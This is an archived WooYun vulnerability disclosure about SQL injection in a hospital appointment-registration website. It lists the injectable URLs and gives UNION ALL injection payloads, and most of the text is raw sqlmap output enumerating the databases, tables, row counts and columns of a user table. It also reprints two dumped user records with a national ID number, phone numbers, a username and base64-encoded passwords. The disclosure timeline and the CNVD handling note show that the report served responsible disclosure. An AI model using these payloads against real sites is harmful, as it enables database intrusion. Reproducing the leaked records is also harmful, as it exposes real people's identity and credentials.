乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-09: 细节已通知厂商并且等待厂商处理中 2015-12-11: 厂商已经确认,细节仅向厂商公开 2015-12-21: 细节向核心白帽子及相关领域专家公开 2015-12-31: 细节向普通白帽子公开 2016-01-10: 细节向实习白帽子公开 2016-01-23: 细节向公众公开
http://**.**.**.**/
注入点:
http://**.**.**.**/plSearchByDoctor.aspx?Doctor=
http://**.**.**.**/plSearchHospital2.aspx?ID=2027
http://**.**.**.**/plSearchList.aspx?TYPE=DEPT&ID=%27%20or%20%271%27=%271
http://**.**.**.**/zkDoctorList.aspx?Type=
http://**.**.**.**/zkZiXun.aspx?ID=ZK00000019
http://**.**.**.**/zkYuYue.aspx?HOSPITALID=ZK00000019
以
为例
Payload: Doctor=-9051%' UNION ALL SELECT NULL,NULL,NULL,NULL,CHAR(113)+CHAR(120)+CHAR(106)+CHAR(98)+CHAR(113)+CHAR(115)+CHAR(74)+CHAR(79)+CHAR(112)+CHAR(77)+CHAR(108)+CHAR(122)+CHAR(89)+CHAR(111)+CHAR(66)+CHAR(113)+CHAR(106)+CHAR(98)+CHAR(113)+CHAR(113)-----[16:27:06] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2008 R2 or 7web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.5back-end DBMS: Microsoft SQL Server 2005[16:27:06] [INFO] testing if current user is DBAcurrent user is DBA: True
Payload: Doctor=-9051%' UNION ALL SELECT NULL,NULL,NULL,NULL,CHAR(113)+CHAR(120)+CHAR(106)+CHAR(98)+CHAR(113)+CHAR(115)+CHAR(74)+CHAR(79)+CHAR(112)+CHAR(77)+CHAR(108)+CHAR(122)+CHAR(89)+CHAR(111)+CHAR(66)+CHAR(113)+CHAR(106)+CHAR(98)+CHAR(113)+CHAR(113)-----[16:22:07] [INFO] testing Microsoft SQL Server[16:22:08] [INFO] confirming Microsoft SQL Server[16:22:12] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2008 R2 or 7web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.5back-end DBMS: Microsoft SQL Server 2005[16:22:12] [INFO] fetching database names[16:22:13] [INFO] the SQL query used returns 10 entries[16:22:15] [INFO] retrieved: Car[16:22:16] [INFO] retrieved: demo[16:22:18] [INFO] retrieved: master[16:22:20] [INFO] retrieved: model[16:22:21] [INFO] retrieved: msdb[16:22:23] [INFO] retrieved: PLATFORM[16:22:25] [INFO] retrieved: REPAIR[16:22:26] [INFO] retrieved: tempdb[16:22:28] [INFO] retrieved: XLIST[16:22:29] [INFO] retrieved: YYGHavailable databases [10]:[*] Car[*] demo[*] master[*] model[*] msdb[*] PLATFORM[*] REPAIR[*] tempdb[*] XLIST[*] YYGH
Payload: Doctor=-4313%' UNION ALL SELECT NULL,NULL,NULL,NULL,CHAR(113)+CHAR(120)+CHAR(112)+CHAR(98)+CHAR(113)+CHAR(82)+CHAR(72)+CHAR(76)+CHAR(102)+CHAR(109)+CHAR(83)+CHAR(74)+CHAR(71)+CHAR(111)+CHAR(112)+CHAR(113)+CHAR(106)+CHAR(107)+CHAR(118)+CHAR(113)-----[16:41:40] [INFO] testing Microsoft SQL Server[16:41:41] [INFO] confirming Microsoft SQL Server[16:41:45] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2008 R2 or 7web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.5back-end DBMS: Microsoft SQL Server 2005[16:41:45] [WARNING] missing table parameter, sqlmap will retrieve the number of entries for all database management system databases' tables[16:41:45] [INFO] fetching tables for database: YYGH[16:41:47] [INFO] the SQL query used returns 108 entries[16:41:48] [INFO] retrieved: dbo.202Admin[16:41:50] [INFO] retrieved: dbo.202Backup[16:41:52] [INFO] retrieved: dbo.202Dept[16:41:53] [INFO] retrieved: dbo.202Level[16:41:55] [INFO] retrieved: dbo.202Log[16:41:57] [INFO] retrieved: dbo.202OrderBase[16:41:58] [INFO] retrieved: dbo.202OrderExpert[16:42:00] [INFO] retrieved: dbo.202OutCall[16:42:02] [INFO] retrieved: dbo.463Admin[16:42:03] [INFO] retrieved: dbo.463Backup[16:42:05] [INFO] retrieved: dbo.463Dept[16:42:07] [INFO] retrieved: dbo.463OrderExpert[16:42:09] [INFO] retrieved: dbo.AdminHos[16:42:10] [INFO] retrieved: dbo.AdminHos[16:42:12] [INFO] retrieved: dbo.AdminHos[16:42:14] [INFO] retrieved: dbo.AdminUser[16:42:16] [INFO] retrieved: dbo.Advice[16:42:18] [INFO] retrieved: dbo.BaoXianUser[16:42:20] [INFO] retrieved: dbo.Code_Admin[16:42:22] [INFO] retrieved: dbo.Code_Area[16:42:23] [INFO] retrieved: dbo.Code_Arrange[16:42:26] [INFO] retrieved: dbo.Code_Blood[16:42:27] [INFO] retrieved: dbo.Code_Degree[16:42:29] [INFO] retrieved: dbo.Code_DeptLevel[16:42:31] [INFO] retrieved: dbo.Code_DeptLevel[16:42:33] [INFO] retrieved: dbo.Code_Education[16:42:34] [INFO] retrieved: dbo.Code_HosLevel[16:42:36] [INFO] retrieved: dbo.Code_HosType[16:42:38] [INFO] retrieved: dbo.Code_Job[16:42:39] [INFO] retrieved: dbo.Code_Level[16:42:41] [INFO] retrieved: dbo.Code_Paper[16:42:43] [INFO] retrieved: dbo.Code_Practice[16:42:44] [INFO] retrieved: dbo.Code_Professional[16:42:46] [INFO] retrieved: dbo.Code_ProfessionalType[16:42:48] [INFO] retrieved: dbo.Code_RH[16:42:49] [INFO] retrieved: dbo.Code_Sex[16:42:51] [INFO] retrieved: dbo.DeptInfo[16:42:52] [INFO] retrieved: dbo.DiseaseBase[16:42:54] [INFO] retrieved: dbo.DiseaseBase[16:42:59] [INFO] retrieved: dbo.DoctAdvice[16:43:00] [INFO] retrieved: dbo.DoctInfo[16:43:02] [INFO] retrieved: dbo.DoctTotal[16:43:04] [INFO] retrieved: dbo.Health_Lecture[16:43:05] [INFO] retrieved: dbo.Health_Memo[16:43:08] [INFO] retrieved: dbo.Health_Record[16:43:10] [INFO] retrieved: dbo.Health_Warning[16:43:12] [INFO] retrieved: dbo.HealthGuide[16:43:13] [INFO] retrieved: dbo.HealthHeart[16:43:15] [INFO] retrieved: dbo.HealthLecture[16:43:16] [INFO] retrieved: dbo.HealthPressure[16:43:18] [INFO] retrieved: dbo.HealthWarning[16:43:20] [INFO] retrieved: dbo.HealthWiki[16:43:22] [INFO] retrieved: dbo.HintDetail[16:43:23] [INFO] retrieved: dbo.HintDetail[16:43:25] [INFO] retrieved: dbo.HospitalDynamic[16:43:27] [INFO] retrieved: dbo.HospitalDynamic[16:43:28] [INFO] retrieved: dbo.HospitalHot[16:43:30] [INFO] retrieved: dbo.HospitalPaiming[16:43:32] [INFO] retrieved: dbo.HospitalRank[16:43:33] [INFO] retrieved: dbo.IpAddress[16:43:35] [INFO] retrieved: dbo.JIBIE[16:43:37] [INFO] retrieved: dbo.JoinInAD[16:43:38] [INFO] retrieved: dbo.JoinInHospital[16:43:40] [INFO] retrieved: dbo.LNZY_DepartmentInformation[16:43:42] [INFO] retrieved: dbo.LNZY_DoctorInformation[16:43:44] [INFO] retrieved: dbo.LNZY_HospitalInformation[16:43:46] [INFO] retrieved: dbo.LNZY_Log[16:43:47] [INFO] retrieved: dbo.LNZY_PreRegister[16:43:49] [INFO] retrieved: dbo.LNZY_ScheduleInformation[16:43:51] [INFO] retrieved: dbo.LNZY_String[16:43:53] [INFO] retrieved: dbo.lock_user[16:43:54] [INFO] retrieved: dbo.Log[16:43:59] [INFO] retrieved: dbo.LSB[16:44:01] [INFO] retrieved: dbo.MediaReport[16:44:02] [INFO] retrieved: dbo.Memo[16:44:04] [INFO] retrieved: dbo.money_add[16:44:06] [INFO] retrieved: dbo.money_all[16:44:07] [INFO] retrieved: dbo.money_t[16:44:10] [INFO] retrieved: dbo.NewsDynamic[16:44:11] [INFO] retrieved: dbo.NewsDynamic[16:44:13] [INFO] retrieved: dbo.NewsQuestion[16:44:15] [INFO] retrieved: dbo.QuestionMoney[16:44:16] [INFO] retrieved: dbo.QuestionMoney[16:44:18] [INFO] retrieved: dbo.R_PREREGISTER[16:44:20] [INFO] retrieved: dbo.reg_user[16:44:22] [INFO] retrieved: dbo.SerialNum[16:44:24] [INFO] retrieved: dbo.SMS[16:44:26] [INFO] retrieved: dbo.SX_Return[16:44:27] [INFO] retrieved: dbo.SX_Return[16:44:29] [INFO] retrieved: dbo.SX_Save[16:44:30] [INFO] retrieved: dbo.system32[16:44:32] [INFO] retrieved: dbo.temp[16:44:34] [INFO] retrieved: dbo.user_reg[16:44:36] [INFO] retrieved: dbo.YaoFang[16:44:37] [INFO] retrieved: dbo.ZK_AdHistory[16:44:39] [INFO] retrieved: dbo.ZK_AdHistory[16:44:41] [INFO] retrieved: dbo.ZK_Admin[16:44:57] [INFO] retrieved: dbo.ZK_AuthorityTechnology[16:44:58] [INFO] retrieved: dbo.ZK_ClassCase[16:45:00] [INFO] retrieved: dbo.ZK_DepartmentInformation[16:45:01] [INFO] retrieved: dbo.ZK_DoctorInformation[16:45:03] [INFO] retrieved: dbo.ZK_Flash[16:45:05] [INFO] retrieved: dbo.ZK_HospitalInformation[16:45:06] [INFO] retrieved: dbo.ZK_ImgNews[16:45:08] [INFO] retrieved: dbo.ZK_MediaReport[16:45:10] [INFO] retrieved: dbo.ZK_MedicalEquipment[16:45:12] [INFO] retrieved: dbo.ZK_Register[16:45:14] [INFO] retrieved: dbo.ZK_TopicRead[16:45:14] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval[16:45:14] [INFO] retrieved:[16:45:15] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'[16:45:15] [INFO] retrieved:[16:45:16] [INFO] retrieved:[16:45:17] [INFO] retrieved:[16:45:18] [INFO] retrieved:[16:45:19] [INFO] retrieved:[16:45:20] [INFO] retrieved:[16:45:21] [INFO] retrieved:[16:45:22] [INFO] retrieved:[16:45:23] [INFO] retrieved:[16:45:24] [INFO] retrieved:[16:45:25] [INFO] retrieved:Database: YYGH+--------------------------------+---------+| Table | Entries |+--------------------------------+---------+| dbo.IpAddress | 444969 || dbo.money_all | 179048 || dbo.reg_user | 125311 || dbo.Log | 62794 || dbo.R_PREREGISTER | 41798 || dbo.user_reg | 28246 || dbo.money_add | 25609 || dbo.HintDetail | 13686 || dbo.HintDetail | 13686 || dbo.QuestionMoney | 4276 || dbo.QuestionMoney | 4276 || dbo.money_t | 2562 || dbo.YaoFang | 2516 || dbo.DoctTotal | 1018 || dbo.DoctInfo | 800 || dbo.JoinInHospital | 672 || dbo.Memo | 480 || dbo.JoinInAD | 452 || dbo.SX_Save | 331 || dbo.HospitalPaiming | 270 || dbo.ZK_Register | 237 || dbo.LNZY_Log | 193 || dbo.LNZY_String | 193 || dbo.ZK_ClassCase | 135 || dbo.ZK_MediaReport | 134 || dbo.ZK_AuthorityTechnology | 131 || dbo.Code_Area | 129 || dbo.ZK_MedicalEquipment | 122 || dbo.temp | 119 || dbo.LNZY_ScheduleInformation | 118 || dbo.ZK_DoctorInformation | 78 || dbo.MediaReport | 73 || dbo.DiseaseBase | 72 || dbo.DiseaseBase | 72 || dbo.Advice | 43 || dbo.ZK_ImgNews | 40 || dbo.lock_user | 36 || dbo.Code_HosType | 33 || dbo.DeptInfo | 32 || dbo.Code_Professional | 24 || dbo.ZK_HospitalInformation | 21 || dbo.HealthPressure | 20 || dbo.ZK_DepartmentInformation | 20 || dbo.DoctAdvice | 19 || dbo.HospitalHot | 19 || dbo.ZK_Admin | 19 || dbo.ZK_TopicRead | 17 || dbo.SMS | 15 || dbo.Code_ProfessionalType | 14 || dbo.LNZY_DoctorInformation | 14 || dbo.HealthGuide | 13 || dbo.SX_Return | 12 || dbo.SX_Return | 12 || dbo.HospitalRank | 11 || dbo.NewsDynamic | 11 || dbo.NewsDynamic | 11 || dbo.HealthHeart | 10 || dbo.HospitalDynamic | 10 || dbo.HospitalDynamic | 10 || dbo.Code_HosLevel | 9 || dbo.NewsQuestion | 9 || dbo.JIBIE | 8 || dbo.ZK_Flash | 8 || dbo.Code_Education | 7 || dbo.Code_Blood | 6 || dbo.Code_Job | 6 || dbo.Code_Admin | 5 || dbo.LNZY_DepartmentInformation | 5 || dbo.AdminUser | 4 || dbo.Code_Degree | 4 || dbo.Code_Paper | 4 || dbo.Code_Practice | 4 || dbo.Code_RH | 4 || dbo.Code_Sex | 4 || dbo.Code_Arrange | 3 || dbo.Code_DeptLevel | 3 || dbo.Code_DeptLevel | 3 || dbo.Code_Level | 3 || dbo.system32 | 3 || dbo.Health_Lecture | 2 || dbo.Health_Memo | 2 || dbo.Health_Record | 2 || dbo.LNZY_PreRegister | 2 || dbo.ZK_AdHistory | 2 || dbo.ZK_AdHistory | 2 || dbo.AdminHos | 1 || dbo.AdminHos | 1 || dbo.AdminHos | 1 || dbo.Health_Warning | 1 || dbo.HealthLecture | 1 || dbo.HealthWarning | 1 || dbo.SerialNum | 1 |+--------------------------------+---------+
Payload: Doctor=-4313%' UNION ALL SELECT NULL,NULL,NULL,NULL,CHAR(113)+CHAR(120)+CHAR(112)+CHAR(98)+CHAR(113)+CHAR(82)+CHAR(72)+CHAR(76)+CHAR(102)+CHAR(109)+CHAR(83)+CHAR(74)+CHAR(71)+CHAR(111)+CHAR(112)+CHAR(113)+CHAR(106)+CHAR(107)+CHAR(118)+CHAR(113)-----[16:56:30] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2008 R2 or 7web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.5back-end DBMS: Microsoft SQL Server 2005[16:56:30] [INFO] fetching columns for table 'reg_user' in database 'YYGH'[16:56:31] [INFO] the SQL query used returns 25 entries[16:56:33] [INFO] retrieved: "answer","varchar"[16:56:35] [INFO] retrieved: "birthday","datetime"[16:56:36] [INFO] retrieved: "email","varchar"[16:56:38] [INFO] retrieved: "id","bigint"[16:56:39] [INFO] retrieved: "job","nvarchar"[16:56:41] [INFO] retrieved: "money","money"[16:56:43] [INFO] retrieved: "name","nvarchar"[16:56:44] [INFO] retrieved: "now","datetime"[16:56:47] [INFO] retrieved: "oldmoney","money"[16:56:48] [INFO] retrieved: "password","nvarchar"[16:56:50] [INFO] retrieved: "phone","nvarchar"[16:56:52] [INFO] retrieved: "postcode","nvarchar"[16:56:53] [INFO] retrieved: "question","varchar"[16:56:55] [INFO] retrieved: "sex","nvarchar"[16:56:57] [INFO] retrieved: "sf","nvarchar"[16:56:59] [INFO] retrieved: "sh","nvarchar"[16:57:01] [INFO] retrieved: "SMS","int"[16:57:02] [INFO] retrieved: "tel1","nvarchar"[16:57:04] [INFO] retrieved: "tel1","nvarchar"[16:57:06] [INFO] retrieved: "username","nvarchar"[16:57:08] [INFO] retrieved: "vipfy","nvarchar"[16:57:10] [INFO] retrieved: "vipfy","nvarchar"[16:57:12] [INFO] retrieved: "viptime","datetime"[16:57:15] [INFO] retrieved: "WeiXin","varchar"[16:57:18] [INFO] retrieved: "ybk","nvarchar"[16:57:18] [INFO] fetching entries for table 'reg_user' in database 'YYGH'[16:57:21] [INFO] fetching number of distinct values for column 'id'[16:57:23] [INFO] fetching number of distinct values for column 'sf'[16:57:25] [INFO] fetching number of distinct values for column 'sh'[16:57:27] [INFO] fetching number of distinct values for column 'SMS'[16:57:29] [INFO] fetching number of distinct values for column 'job'[16:57:31] [INFO] fetching number of distinct values for column 'now'[16:57:32] [INFO] fetching number of distinct values for column 'sex'[16:57:34] [INFO] fetching number of distinct values for column 'ybk'[16:57:36] [INFO] fetching number of distinct values for column 'name'[16:57:37] [INFO] fetching number of distinct values for column 'tel1'[16:57:39] [INFO] fetching number of distinct values for column 'email'[16:57:41] [INFO] fetching number of distinct values for column 'money'[16:57:46] [INFO] fetching number of distinct values for column 'phone'[16:57:47] [INFO] fetching number of distinct values for column 'vipfy'[16:57:50] [INFO] fetching number of distinct values for column 'WeiXin'[16:57:53] [INFO] fetching number of distinct values for column 'answer'[16:57:55] [INFO] fetching number of distinct values for column 'viptime'[16:57:57] [INFO] fetching number of distinct values for column 'birthday'[16:58:03] [INFO] fetching number of distinct values for column 'oldmoney'[16:58:05] [INFO] fetching number of distinct values for column 'password'[16:58:07] [INFO] fetching number of distinct values for column 'postcode'[16:58:09] [INFO] fetching number of distinct values for column 'question'[16:58:10] [INFO] fetching number of distinct values for column 'username'[16:58:12] [WARNING] no proper pivot column provided (with unique values). It won't be possible to retrieve all rows[16:59:37] [INFO] analyzing table dump for possible password hashesDatabase: YYGHTable: reg_user[2 entries]+--------+----+--------------------+-----+-----+--------------------+------+--------------------------------+-------------+--------+-------+-------+---------------+-------+--------+--------+--------------------+----------+----------+------------+-------------+--------------------+------------------+| id | sh | sf | SMS | sex | now | ybk | job | tel1 | name | vipfy | money | email | phone | WeiXin | answer | viptime | oldmoney | postcode | question | username | birthday | password |+--------+----+--------------------+-----+-----+--------------------+------+--------------------------------+-------------+--------+-------+-------+---------------+-------+--------+--------+--------------------+----------+----------+------------+-------------+--------------------+------------------+[16:59:37] [WARNING] cannot properly display Unicode characters inside Windows OS command prompt (http://**.**.**.**/issue1602). All unhandled occurances will result in replacement with '?' character. Please, find proper character representation inside corresponding output files.| ???????÷ˇá???÷ˇá?ň??????????×é | 13940131241 | ???¤ | NULL | 0.00 |NULL | NULL | NULL | ???? | 01 1 1900 12:00AM | 0.00 | 110000 | ?????????? | ???¤???? | 07 21 1985 12:00AM | ODM4ODM4bGlkYQ== || 100000 | 1 | 210904195806021019 | 0 | 1 | 03 19 2015 12:00AM | NULL | <blank> | 13841839696 | ?????? | NULL | 0.00 | [email protected]om | NULL | NULL | NULL | NULL | NULL | <blank> | NULL | lizhihualzh | 06 2 1958 12:00AM | MDAwMDAw |+--------+----+--------------------+-----+-----+--------------------+------+--------------------------------+-------------+--------+-------+-------+---------------+-------+--------+--------+--------------------+----------+----------+------------+-------------+--------------------+------------------+
你们比我更专业
危害等级:高
漏洞Rank:10
确认时间:2015-12-11 17:57
CNVD确认并复现所述情况,已经转由CNCERT下发给辽宁分中心,由其后续协调网站管理单位处置.
暂无
